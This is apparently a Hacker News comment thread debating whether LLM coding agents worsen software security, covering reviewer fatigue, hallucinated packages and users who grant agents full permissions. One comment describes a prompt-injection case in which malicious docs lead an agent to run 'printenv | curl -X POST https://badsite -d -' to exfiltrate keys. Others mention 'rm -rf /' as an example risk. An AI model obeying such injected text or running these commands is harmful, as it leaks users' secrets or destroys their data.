LLMs and coding agents are a security nightmare

> might ok a code change they shouldn’t have

Is the argument that developers who are less experience/in a hurry, will just accept whatever they're handed? In that case, this would be as true for random people submitting malicious PRs that someone accepts without reading, even without an LLM involved at all? Seems like an odd thing to call a "security nightmare".

flail · 6 days ago

One thing relying on coding agents does is it changes the nature of the work from typing-heavy (unless you count prompting) to code-review-heavy.

Cognitively, these are fairly distinct tasks. When creating code, we imagine architecture, tech solutions, specific ways of implementing, etc., pre-task. When reviewing code, we're given all these.

Sure, some of that thinking would go into prompting, but not to such a detail as when coding.

What follows is that it's easier to make a vulnerability pass through. More so, given that we're potentially exposed to more of them. After all, no one coding manually would consciously add vulnerability to their code base. Ultimately, all such cases are by omission.

A compromised coding agent would try that. So, we have to change the lenses from "vulnerability by omission only" to "all sorts of malicious active changes" too.

An entirely separate discussion is who reviews the code and what security knowledge they have. It's easy to dismiss the concern once a developer has been dealing with security for years. But these are not the only developers who use coding agents.

fzeroracer · 6 days ago

Consider the following scenario: You're a developer in charge of implementing a new service. This service interfaces with one of your internal DBs containing valuable customer data. You decide to use a coding agent to make things go a little bit faster, after all your requests are not very complicated and it's bound to be fairly well known.

The agent decides to import a bunch of different packages. One of them is a utility package hallucinated by the LLM. Just one line being imported erroneously, and now someone can easily exfiltrate data from your internal DB and make it very expensive. And it all looks correct upfront.

You know what the nice thing is about actually writing code? We make inferences and reasoning for what we need to do. We make educated judgments about whether or not we need to use a utility package for what we're doing, and in the process of using said utility can deduce how it functions and why. We can verify that it's a valid, safe tool to use in production environments. And this reduces the total attack surface immensely; even if some things can slip through the odds of it occurring are drastically reduced.

prisenco · 6 days ago

If we increase the velocity of changes to a codebase, even if those changes are being reviewed, it stands to reason that the rate of issues will increase due to fatigue on the part of the reviewer.

Consider business pressures as well. If LLMs speed up coding 2x (generously), will management accept losing that because of increased scrutiny?

bluefirebrand · 6 days ago

> will management accept losing that because of increased scrutiny

If they don't then they're stupid

This has been the core of my argument against LLM tools for coding all along. Yes they might get you to a working piece of software faster, but if you are doing actual due diligence reviewing the code they produce then you likely aren't saving time

The only way they save you time is if you are careless and not doing your due diligence to verify their outputs

mywittyname · 6 days ago

> Is the argument that developers who are less experience/in a hurry,

The CTO of my company has pushed multiple AI written PRs that had obvious breaks/edge cases, even after chastising other people for having done the same.

It's not an experience issue. It's a complacency issue. It's a testing issue. It's the price companies pay to get products out the door as quickly as possible.

flail · 6 days ago

Stories about CTOs heavily overrelying on their long-outdated coding experience are plenty. If that's an ego thing ("I can still do that and show them that I can"), they're going to do that with little care about the consequences.

At that level, it's the combination of all the power and not that much tech expertise anymore. A vulnerable place.

A lot of famous hacks targeted humans as a primary weak point (gullibility, incompetence, naivety, greed, curiosity, take your pick), and technology only as a secondary follow-up.

An example: Someone had to pick up that "dropped" pendrive in a cantina and plug it into their computer in a 100% isolated site to enable Stuxnet.

Were I a black hat hacker, targeting CTOs' egos would be high on my priority list.

A4ET8a8uTh0_v2 · 6 days ago

This. Our company rolled out 'internal' AI ( in quotes, because its a wrapper on chatgpt with some mild regulatory checks on output ). We were officially asked to use it for tasks wherever possible. And during training sessions, my question about privacy ( as users clearly are not following basic hygiene for attached file ) was not just dismissed, but ignored.

I am not a luddite. I see great potential in this tech, but holy mackarel will there be price to pay.

SamuelAdams · 6 days ago

I was also confused. In our organization all PR’s must always be reviewed by a knowledgeable human. It does not matter if it was all LLM generated or written by a person.

If insecure code makes it past that then there are bigger issues - why did no one catch this, is the team understanding the tech stack well enough, and did security scanning / tooling fall short, and if so how can that be improved?

hgomersall · 6 days ago

Well LLMs are designed to produce code that looks right, which arguably makes the code review process much harder.

reilly3000 · 6 days ago

The attack isn’t bad code. It could be malicious docs that tell the LLM to make a tool call to printenv | curl -X POST https://badsite -d - and steal your keys.

IanCal · 6 days ago

Aside from noting that reviews are not perfect and increased attacks is a risk anyway - the other major risk is running code on your dev machine. You may think to review this more for an unknown pr than an llm suggestion.

mns · 6 days ago

I think that you're under the impression that most code reviews in most of the companies out there are more than people just hitting a button in case tests pass.

thisisit · 6 days ago

More and more companies are focusing on costs and timelines over anything else. That means if they are convinced that AI can move things faster and be cost efficient they are going to use more AI and revise cost and time downwards.

AI can write plausible code without stopping. So, not only you get sheer volume of PRs going up at the same time you might be asked to do things "faster" because you can always use AI. I am sure some CTOs might even say - why not use AI to review AI code to make it faster?

Not to mention previously the random people submitting malicious PRs needed to have some experience. But now every script kiddie can get LLMs to out the malicious PRs without knowledge and scale. How is that not a "security nightmare"?

hluska · 6 days ago

I’ve seen LLMs rolled out in several organizations now and have noticed a few patterns. The big one is that we have less experienced people reviewing code an LLM generated for them. They don’t have the experience to pick out those solutions that are correct 98% of the time, but not now.

When management wants to see dollars, extra reviews are an easy place to cut. They don’t have the experience to understand what they’re doing because this has never happened before.

Meanwhile the technical people complain but not in a way that non technical people can understand. So you create data points that are not accessible to decision makers and there you go, software gets bad for a little while.

stronglikedan · 6 days ago

> developers who are less experience/in a hurry, will just accept whatever they're handed

It's been going on since Stack Exchange copypasta, and even before that in other forms. Nothing new under the sun.

gherkinnn · 6 days ago

Agents execute code locally and can be very enthusiastic. All it takes is bad access control and a --prod flag to wipe a production DB.

The nature of code reviews has changed too. Up until recently I could expect the PR to be mostly understood by the author. Now the code is littered with odd patterns, making it almost adversarial.

Both can be minimised in a solid culture.

leeoniya · 6 days ago

> I could expect the PR to be mostly understood by the author

i refuse to review PRs that are not 100% understood by the author. it is incredibly disrespectful to unload a bunch of LLM slop onto your peers to review.

if LLMs saved you time, it cannot be at the expense of my time.

Deleted Comment

Benjammer · 6 days ago

This is the common refrain from the anti-AI crowd, they start by talking about an entire class of problems that already exist in humans-only software engineering, without any context or caveats. And then, when someone points out these problems exist with humans too, they move the goalposts and make it about the "volume" of code and how AI is taking us across some threshold where everything will fall apart.

The telling thing is they never mention this "threshold" in the first place, it's only a response to being called on the bullshit.

bpt3 · 6 days ago

It's not bullshit. LLMs lower the bar for developers, and increase velocity.

Increasing the quantity of something that is already an issue without automation involved will cause more issues.

That's not moving the goalposts, it's pointing out something that should be obvious to someone with domain experience.

I’ve noticed a strong negative streak in the security community around LLMs. Lots of comments about how they’ll just generate more vulnerabilities, “junk code”, etc.

It seems very short sighted.

I think of it more like self driving cars. I expect the error rate to quickly become lower than humans.

Maybe in a couple of years we’ll consider it irresponsible not to write security and safety critical code with frontier LLMs.

xnorswap · 6 days ago

I've been watching a twitch streamer vibe-code a game.

Very quickly he went straight to, "Fuck it, the LLM can execute anything, anywhere, anytime, full YOLO".

Part of that is his risk-appetite, but it's also partly because anything else is just really furstrating.

Someone who doesn't themselves code isn't going to understand what they're being asked to allow or deny anyway.

To the pure vibe-coder, who doesn't just not read the code, they couldn't read the code if they tried, there's no difference between "Can I execute grep -e foo */*.ts" and "Can I execute rm -rf /".

Both are meaningless to them. How do you communicate real risk? Asking vibe-coders to understand the commands isn't going to cut it.

So people just full allow all and pray.

That's a security nightmare, it's back to a default-allow permissive environment that we haven't really seen in mass-use, general purpose internet connected devices since windows 98.

The wider PC industry has got very good at UX to the point where most people don't need to worry themselves about how their computer works at all and still successfully hide most of the security trappings and keep it secure.

Meanwhile the AI/LLM side is so rough it basically forces the layperson to open a huge hole they don't understand to make it work.

tootubular · 6 days ago

I know exactly the streamer you're referring to and this is the first time I've seen an overlap between these two worlds! I bet there are quite a few of us. Anyway, agreed on all accounts, watching someone like him has been really eye opening on how some people use these tools ... and it's not pretty.

voidUpdate · 6 days ago

Yeah, it does sound a lot like self-driving cars. Everyone talks about how they're amazing and will do everything for you but you actually have to constantly hold their hand because they aren't as capable as they're made out to be

bpt3 · 6 days ago

You're talking about a theoretical problem in the future, while I assure you vibe coding and agent based coding is causing major issues today.

Today, LLMs make development faster, not better.

And I'd be willing to bet a lot of money they won't be significantly better than a competent human in the next decade, let alone the next couple years. See self-driving cars as an example that supports my position, not yours.

anonzzzies · 6 days ago

Does it matter though? Programming was already terrible. There are a few companies doing good things, the rest made garbage already for the past decades. No one cares (well; consumers don't care; companies just have insurance when it happens so they don't really care either; it's just a necessary line item) about their data being exposed etc as long as things are cheap cheap. People daily work with systems that are terrible in every way and then they get hacked (for ransom or not). Now we can just make things cheaper/faster and people will like it. Even at the current level software will be vastly easier and faster to make; sure it will suck, but I'm not sure anyone outside HN cares in any way shape or form (I know our clients don't; they are shipping garbage faster than ever and they see our service as a necessary business expense IF something breaks/messes up). Which means that it won't matter if LLMs get better; it matters that they get a lot cheaper so we can just run massive amounts of them on every device committing code 24/7 and that we keep up our tooling to find possible minefields faster and bandaid them until the next issue pops up.

furyofantares · 6 days ago

> Today, LLMs make development faster, not better.

You don't have to use them this way. It's just extremely tempting and addictive.

You can choose to talk to them about code rather than features, using them to develop better code at a normal speed instead of worse code faster. But that's hard work.

philipp-gayret · 6 days ago

What metric would you measure to determine whether a fully AI-based flow is better than a competent human engineer? And how much would you like to bet?

kriops · 6 days ago

> I think of it more like self driving cars.

Analogous to the way I think of self-driving cars is the way I think of fusion: perpetually a few years away from a 'real' breakthrough.

There is currently no reason to believe that LLMs cannot acquire the ability to write secure code in the most prevalent use cases. However, this is contingent upon the availability of appropriate tooling, likely a Rust-like compiler. Furthermore, there's no reason to think that LLMs will become useful tools for validating the security of applications at either the model or implementation level—though they can be useful for detecting quick wins.

lxgr · 6 days ago

Have you ever taken a Waymo? I wish fusion was as far along!

rpicard · 6 days ago

My car can drive itself today.

andrepd · 6 days ago

Let's maybe cross that bridge when (more important, if!) we come to it then? We have no idea how LLMs are gonna evolve, but clearly now they are very much not ready for the job.

kingstnap · 6 days ago

For now we train LLMs on next token prediction and Fill-in-the-middle for code. This exactly reflects in the experience of using them in that over time they produce more and more garbage.

It's optimistic but maybe once we start training them on "remove the middle" instead it could help make code better.

tptacek · 6 days ago

There are plenty of security people on the other side of this issue; they're just not making news, because the way you make news in security is by announcing vulnerabilities. By way of example, last I checked, Dave Aitel was at OpenAI.

rpicard · 6 days ago

Fair! I’ve been surprised in some cases. I’m thinking specifically of a handful of conversations I was in or around during the Vegas cons.

I might also be hyper sensitive to the cynicism. It tends to bug me more than it probably should.

Dead Comment

croes · 6 days ago

It’s the same problem as with self driving cars.

Self driving cars maybe be better than the average driver but worse than the top drivers.

For security code it’s the same.

lxgr · 6 days ago

Regardless of whether that comparison is valid: In a world where the average driver is average, that honestly doesn't sound too bad.